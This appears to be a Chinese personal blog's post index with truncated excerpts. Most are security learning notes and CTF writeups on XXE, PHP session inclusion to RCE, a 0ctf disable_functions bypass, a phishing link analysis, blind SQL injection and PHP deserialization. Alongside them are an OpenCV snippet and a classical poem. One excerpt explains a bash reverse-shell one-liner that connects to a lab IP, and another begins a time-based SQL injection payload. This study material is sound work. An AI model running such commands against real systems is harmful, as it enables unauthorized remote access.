对xxe的理解
一、什么是xml可扩展标记语言(英语:Extensible Markup Language,简称:XML)是一种标记语言。标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种信息的文章等。如何定义这些标记,既可以选择国际通用的标记语言,比如HTML,也可以使用像XML这样由相关人 ...
php的理解
0%00 php中的系统变量,全局可用123456789$GLOBALS // 引用全局作用域中可用的全部变量$_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 sessi ...
包含session文件到rce
这个思路来自于2019年全国大学生信息安全竞赛一个大佬writeup的web题的一个预期之外的解,出题人应该是想用一个文件包含再加上php反序列化来读取flag文件,下面这个方法没有用到php反序列化就读取到了flag文件。
下面是php7.x中session的默认配置及含义:
sess ...
一次数学建模的图像识别
这是一次数学建模用到的图像识别代码,是关于python的opencv库的使用,在使用之前请安装opencv库。
下面是代码:
1234567891011121314151617def modify_picture1(filename,n): image = cv2.imread(filenam ...
0ctf的web题WallbreakerEasy
0ctf web Wallbreaker Easy题目:
12345Imagick is a awesome library for hackers to break `disable_functions`.So I installed php-imagick in the serv ...
反弹shell命令解析
以前做题时经常发现大佬用一行命令getshell,虽然自己有时侯也在用,但是并不知道到底为什么用这个命令。今天,我想去理解下为什么用这个命令getshell。
getshell的命令是:
bash -i >& /dev/tcp/192.168.174.128/6666 0>&a ...
诗经
淇奥
诗经·国风·卫风·淇奥
瞻彼淇奥,绿竹猗猗。有匪君子,如切如磋,如琢如磨。瑟兮僩兮,赫兮咺兮。有匪君子,终不可谖兮。
瞻彼淇奥,绿竹青青。有匪君子,充耳琇莹,会弁如星。瑟兮僩兮,赫兮咺兮。有匪君子,终不可谖兮。
瞻彼淇奥,绿竹如箦。有匪君子,如金如锡,如圭如璧。宽兮绰兮,猗重较兮。善戏谑 ...
一次不成功的渗透
3月26日早上,我的qq邮箱中有人给我发了一封邮件,点进去一看,居然是http://mail.qq.com.biy.suyrgroup.cn 这个域名,很具有迷惑性,然后返回去看,他邮箱给的网址是t.cn/EJIWUqj,可以猜测,他应该是设置了一个跳转,然后在输入qq密码和账号的网站随便 ...
漏洞特征总结
sql注入任何和数据库有交互的数据中,都有可能存在sql注入
盲注是通过构造SQL判断语句,通过返回页面的不同将信息判断出来。返回页面有三种:有结果页面、0结果页面和错误过滤页面。只要有其中的两个页面,无论哪两个页面都可以,就可以判断存在注入漏洞。
基于时间的盲注:' and if(asci ...
php反序列化
1 、漏洞代码12345678910111213141516171819202122<?phpclass F{ public $filename='a.txt'; function __construct() { echo phpinfo() ...
